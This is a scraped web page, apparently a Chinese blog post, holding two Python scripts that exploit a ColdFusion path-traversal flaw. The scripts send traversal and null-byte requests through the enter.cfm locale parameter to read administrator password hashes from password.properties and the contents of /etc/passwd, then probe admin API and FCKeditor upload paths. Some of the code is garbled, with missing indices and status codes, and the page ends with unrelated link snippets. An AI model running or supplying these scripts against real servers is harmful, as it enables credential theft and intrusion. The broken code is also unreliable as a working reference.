#!/usr/bin/env python

#-*- coding:utf- -*-

import sys

import threading

import urllib

import httplib

class Mythread(threading.Thread):

        def __init__(self,host):

            threading.Thread.__init__(self)

            self.host = host

        def run(self):

            urls = ['/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00en',

                '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\lib\password.properties%00en',

                '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\lib\password.properties%00en',

                '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\lib\password.properties%00en',

                '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\lib\password.properties%00en',

                '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\lib\password.properties%00en',

                '/CFIDE/administrator/enter.cfm?locale=..\..\..\lib\password.properties%00en',

                '/CFIDE/administrator/enter.cfm?locale=..\..\lib\password.properties%00en',

                '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX\lib\password.properties%00en',

                '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX7\lib\password.properties%00en',

                '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',

                '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',

                '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',

                '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',

                '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',

                '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',

                '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',

                '/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en',

                '/CFIDE/administrator/enter.cfm?locale=..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',

                '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\etc\passwd%00en',

                '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\etc\passwd%00en',

                '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\etc\passwd%00en',

                '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\etc\passwd%00en',

                '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\etc\passwd%00en',

                '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\etc\passwd%00en',

                '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\etc\passwd%00en',

                '/CFIDE/administrator/enter.cfm?locale=..\..\..\etc\passwd%00en',

                '/CFIDE/administrator/enter.cfm?locale=..\..\etc\passwd%00en']

            try:

                for path in urls:

                    out = urllib.urlopen(self.host + path).read().split(r'</title>')[].split(r'<title>')[].replace(r'rdspassword=', '\n').replace(r'encrypted=true', '\n')

                    print out

            except Exception:

                print "Error connect time"

            self.scanner()

        def scanner(self):

            #self.host = host

            cfmfck = ['/CFIDE/adminapi/_datasource/formatjdbcurl.cfm',

            '/CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm',

            '/CFIDE/adminapi/_datasource/geturldefaults.cfm',

            '/CFIDE/adminapi/_datasource/setdsn.cfm',

            '/CFIDE/adminapi/_datasource/setmsaccessregistry.cfm',

            '/CFIDE/adminapi/_datasource/setsldatasource.cfm',

            '/CFIDE/adminapi/customtags/l10n.cfm',

            '/CFIDE/debug/cf_debugFr.cfm',

            '/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm']

            i_headers = {"User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5","Accept": "text/plain"}

            for fckpath in cfmfck:

                if self.host[:] == "https://":

                    conn = httplib.HTTPSConnection(self.host.replace("https://",""))

                else:

                    conn = httplib.HTTPConnection(self.host.replace("http://",""))

                conn.request('GET',fckpath,headers = i_headers)

                r1 = conn.getresponse()

                if r1.status ==  or r1.status ==  or r1.status == :

                    print self.host + fckpath + "   " + str(r1.status)

if __name__ == "__main__":

    Mythread(sys.argv[]).start()
#!/usr/bin/env python

# -*- coding: utf8 -*-

import sys , urllib , httplib , subprocess

def banner():

    print """

#--------------------------------------------------#

#       Welcome to www.90sec.org                   #

#        THis is read ColdFusion sha1 Tool         #

#       python COldFusion.py www.WebSite.cn        #

#--------------------------------------------------#

"""

urls = ['/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00en',

       '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\lib\password.properties%00en',

       '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\lib\password.properties%00en',

       '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\lib\password.properties%00en',

       '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\lib\password.properties%00en',

       '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\lib\password.properties%00en',

       '/CFIDE/administrator/enter.cfm?locale=..\..\..\lib\password.properties%00en',

       '/CFIDE/administrator/enter.cfm?locale=..\..\lib\password.properties%00en',

       '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX\lib\password.properties%00en',

       '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX7\lib\password.properties%00en',

       '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',

       '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',

       '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',

       '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',

       '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',

       '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',

       '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',

       '/CFIDE/administrator/enter.cfm?locale=..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en',

       '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\etc\passwd%00en',

       '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\etc\passwd%00en',

       '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\etc\passwd%00en',

       '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\etc\passwd%00en',

       '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\etc\passwd%00en',

       '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\etc\passwd%00en',

       '/CFIDE/administrator/enter.cfm?locale=..\..\..\..\etc\passwd%00en',

       '/CFIDE/administrator/enter.cfm?locale=..\..\..\etc\passwd%00en',

       '/CFIDE/administrator/enter.cfm?locale=..\..\etc\passwd%00en']

cfmfck = ['/CFIDE/adminapi/_datasource/formatjdbcurl.cfm','/CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm','/CFIDE/adminapi/_datasource/geturldefaults.cfm','/CFIDE/adminapi/_datasource/setdsn.cfm','/CFIDE/adminapi/_datasource/setmsaccessregistry.cfm','/CFIDE/adminapi/_datasource/setsldatasource.cfm','/CFIDE/adminapi/customtags/l10n.cfm','/CFIDE/debug/cf_debugFr.cfm','/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm']

try:

    host = sys.argv[1]

    if len(host) < '':

        banner()

    for url in urls:

        context = urllib.urlopen(host + url).read()

        out = context.split(r'</title>')[0].split(r'<title>')[1].replace(r'rdspassword=', '\n').replace(r'encrypted=true', '\n')

        print out

except Exception:

    banner()

    sys.exit()

else:

      for line in cfmfck:

            host = host.replace("http://","")

            line = line.replace("\n","")

            line = "/" + line

            website = host + line

            connection = httplib.HTTPConnection(host)

            connection.request("GET",line)

            response = connection.getresponse()

            if response.status == 200:

                  print website , ''

            elif response.status == 403:

                  print website , ''

            elif response.status == 500:

              print website , 'server ERROR'

Coldfusion8 读取HASH工具的更多相关文章

  1. Redis操作Hash工具类封装,Redis工具类封装

    Redis操作Hash工具类封装,Redis工具类封装 >>>>>>>>>>>>>>>>>> ...

  2. Hash工具下载地址

    因为经常要在非常用电脑使用,这里放一个链接,方便下载: http://files.cnblogs.com/files/cxun/Hash.zip HASH计算工具,可计算MD5.SHA-1.CRC32 ...

  3. POI读取excel工具类 返回实体bean集合(xls,xlsx通用)

    本文举个简单的实例 读取上图的 excel文件到 List<User>集合 首先 导入POi 相关 jar包 在pom.xml 加入 <!-- poi --> <depe ...

  4. .NET Core 常用加密和Hash工具NETCore.Encrypt

    前言 在日常开发过程中,不可避免的涉及到数据加密解密(Hash)操作,所以就有想法开发通用工具,NETCore.Encrypt就诞生了.目前NETCore.Encrypt只支持.NET Core ,工 ...

  5. poi读取excel工具类

    package com.manage.utils; import ch.qos.logback.core.net.SyslogOutputStream; import com.google.gson. ...

  6. 读取配置文件工具demo

    //读取配置文件public class ResourcesUtils { /* * @description:根据属性获取文件名 * * @param:propertyName文件的属性名 * * ...

  7. 【工具】读取proprtties工具类

    获取properties内容: 基本的使用看网络上大多是这样的,使用时注意线程安全以及读写的实时性问题. 1.直接通过流读取(反射): InputStream inStream =  this.get ...

  8. meterpreter读取hash明文记录

    今天测试某个站点时读hash老出错 这里做下读hash的笔记 进去meterpreter后getuid一 1 2 meterpreter > getuid Server username: NT ...

  9. PropertiesUtil 读取配置文件工具类

    package org.konghao.basic.util; import java.io.FileInputStream; import java.io.FileNotFoundException ...

随机推荐

  1. 【BZOJ4590】[Shoi2015]自动刷题机 二分

    [BZOJ4590][Shoi2015]自动刷题机 Description 曾经发明了信号增幅仪的发明家SHTSC又公开了他的新发明:自动刷题机--一种可以自动AC题目的神秘装置.自动刷题机刷题的方式 ...

  2. DTD的学习和理解

    看log4j的官方文档,上面说提供了XML格式的配置,但是没有XML具体示例.发现文档中说的是一个DTD文档,但我根本不知道DTD是什么,于是就简单了解一下.顺带做一下笔记. 注:结合笔记看log4j ...

  3. angular.js记录

    http://www.runoob.com/angularjs/angularjs-tutorial.html 第一部分:快速上手1.1 angularJS四大核心特性1.2 自己动手搭建开发,调试, ...

  4. IO流入门-第七章-BufferedReader

    BufferedReader基本用法和方法示例 /* 字节 BufferedInputStream BufferedOutputStream 字符 BufferedReader:带有缓冲区的字符输入流 ...

  5. 转!!CSRF攻击与防御(写得非常好)

    CSRF概念:CSRF跨站点请求伪造(Cross—Site Request Forgery),跟XSS攻击一样,存在巨大的危害性,你可以这样来理解:       攻击者盗用了你的身份,以你的名义发送恶 ...

  6. 《Redis官方文档》用Redis构建分布式锁

    用Redis构建分布式锁 在不同进程需要互斥地访问共享资源时,分布式锁是一种非常有用的技术手段. 有很多三方库和文章描述如何用Redis实现一个分布式锁管理器,但是这些库实现的方式差别很大,而且很多简 ...

  7. golang的多协程实践

    go语言以优异的并发特性而闻名,刚好手上有个小项目比较适合. 项目背景: 公司播控平台的数据存储包括MySQL和ElasticSearch(ES)两个部分,编辑.运营的数据首先保存在MySQL中,为了 ...

  8. 玩玩nmap

    ---恢复内容开始--- [root@miyan ~]# nmap -v Starting Nmap 7.12 ( https://nmap.org ) at 2016-04-04 15:34 CST ...

  9. 3 TensorFlow入门之识别手写数字

    ------------------------------------ 写在开头:此文参照莫烦python教程(墙裂推荐!!!) ---------------------------------- ...

  10. python16_day14【jQuery】

    一.作用域 1.作用域例一 <script> var str = "global"; //AO1 AO1.str function t(age){ console.lo ...